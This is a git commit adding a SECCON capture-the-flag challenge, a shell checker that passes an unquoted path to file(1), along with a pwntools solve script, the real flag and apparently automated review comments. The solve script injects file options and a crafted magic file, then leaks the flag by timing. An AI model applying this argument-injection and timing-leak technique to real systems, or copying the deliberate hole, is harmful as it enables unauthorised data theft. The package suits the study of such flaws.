commit d443cc3152fc206e4393e9809f282722200308ca
Author: Louis Burda <quent.burda@gmail.com>
Date: Fri, 10 May 2024 20:02:22 +0200
Add solution
Diffstat:
7 files changed, 101 insertions(+), 0 deletions(-)
diff --git a/chall/Dockerfile b/chall/Dockerfile
@@ -0,0 +1,25 @@
+FROM ubuntu:jammy
+
+RUN apt-get update && apt-get -y install openssh-server file procps
+
+WORKDIR /app
+
+RUN groupadd -r ctf && useradd -m -r -g ctf ctf
+RUN echo "ctf:ctf" | chpasswd
+
+RUN echo 'ForceCommand "/app/checker.sh"' >> /etc/ssh/sshd_config
+RUN echo 'Port 2022' >> /etc/ssh/sshd_config
+RUN mkdir /var/run/sshd
+
+COPY flag.txt /
+COPY checker.sh /app/
+
+RUN chmod 444 /flag.txt
+RUN chmod 555 /app/checker.sh
+
+CMD while true; do \
+ # kill long running processes for ssh
+ ps -eo comm,pid,etimes | awk '/^checker.sh/ {if ($3 > 10) { print $2 }}' | xargs --no-run-if-empty kill -9; \
+ sleep 5s; \
+ done & \
+ /sbin/sshd -D
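Review bot: The lines appended to `/etc/ssh/sshd_config` set only `ForceCommand` and `Port`, so every forwarding option stays at whatever the stock Ubuntu config provides. `ForceCommand` fixes the session command but does not by itself turn off TCP, agent or X11 forwarding, and the `ctf:ctf` login is shared by design. I would add `RUN echo 'DisableForwarding yes' >> /etc/ssh/sshd_config` next to the `ForceCommand` line. Because sshd keeps the first value it reads for a keyword, a single override like this is safer than appending individual `...Forwarding no` lines that an earlier entry in the file may already have decided.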
diff --git a/chall/checker.sh b/chall/checker.sh
@@ -0,0 +1,9 @@
+#!/bin/bash
+
+read -p "Input a file path: " filepath
+file $filepath 2>/dev/null | grep -q "ASCII text" 2>/dev/null
+
+# TODO: print the result the above command.
+# $? == 0 -> It's a text file.
+# $? != 0 -> It's not a text file.
+exit 0
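Review bot: `$filepath` is expanded unquoted on the `file` line, so the text typed at the prompt is word-split and glob-expanded into several arguments, and a word starting with `-` is parsed by `file` as an option rather than a path. This looks like the intended challenge flaw, but nothing in the script says so. A comment such as `# intentionally unquoted: this is the challenge bug` would stop a later cleanup from silently changing the challenge. In any copy of this script that is not meant to be vulnerable, the line should read `file -- "$filepath" 2>/dev/null | grep -q "ASCII text"`, with `read -r -p` on the prompt line so backslashes are taken literally.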
diff --git a/chall/docker-compose.yml b/chall/docker-compose.yml
@@ -0,0 +1,8 @@
+version: "3"
+
+services:
+ challenge:
+ build: .
+ restart: always
+ ports:
+ - 2022:2022
diff --git a/chall/flag.txt b/chall/flag.txt
@@ -0,0 +1 @@
+SECCON{dummy}
diff --git a/solve/flag b/solve/flag
@@ -0,0 +1 @@
+SECCON{reDo5L1fe}
diff --git a/solve/requirements.txt b/solve/requirements.txt
@@ -0,0 +1 @@
+pwntools==4.9.0
diff --git a/solve/solve.py b/solve/solve.py
@@ -0,0 +1,56 @@
+from pwn import *
+import time
+
+cmd = f"sshpass -p ctf ssh -oStrictHostKeyChecking=no " \
+ + f"-oCheckHostIP=no ctf@localhost -p 2022"
+
+magic_file = """
+
+#------------------------------------------------------------------------------
+# $File: warc,v 1.4 2019/04/19 00:42:27 christos Exp $
+# warc: file(1) magic for WARC files
+
+0 string {} SECCON FLAG
+!:mime application/warc
+
+"""
+
+n = 0
+avg = 5
+def getchar(prefix=""):
+ global n, avg
+
+ alph = string.ascii_lowercase + string.digits + "_"
+ alph = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\'()*+,-./:;<=>?@[]^_`{|}~'
+ for c in alph:
+ attempt = prefix + c
+ print(f">>> {attempt}")
+ io = process(cmd.split(), stdin=PTY, raw=False)
+ io.readuntil(b"Input a file path: ")
+ io.sendline(b"-n -s -P bytes=99999999999 -m /dev/stdin /flag.txt /dev/full /dev/full /dev/full /dev/full /dev/full /dev/full /dev/full /dev/full")
+ io.sendline(magic_file.format(attempt).encode())
+ io.send(b"\4")
+ start = time.time()
+ print(io.readall())
+ end = time.time()
+ dur = end - start
+
+ print("DUR", dur)
+ print("AVG", avg)
+ if end - start >= avg + 5:
+ return c
+ n += 1
+ avg = ((n - 1) * avg + dur) / n
+ io.close()
+ return None
+
+flag = "SECCON{"
+while True:
+ try:
+ while c := getchar(prefix=flag):
+ flag += c
+ print(flag)
+ except Exception as e:
+ raise e
+ print("Exception, sleeping..")
+ time.sleep(30)
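Review bot: In `getchar`, the `return c` branch leaves the function before `io.close()` runs, so the process object and its PTY are never closed on that path; putting the per-candidate work in `try:` with `finally: io.close()` covers both exits. The first `alph = string.ascii_lowercase + string.digits + "_"` is overwritten on the next line, and `string` is only in scope through `from pwn import *`, so either drop the dead assignment or add an explicit `import string`. In the driver loop, `raise e` makes the `print("Exception, sleeping..")` and `time.sleep(30)` lines unreachable, and the outer `while True` has no exit once `getchar` returns `None`. Decide whether the handler should retry or propagate, and add a `break` after the inner `while`.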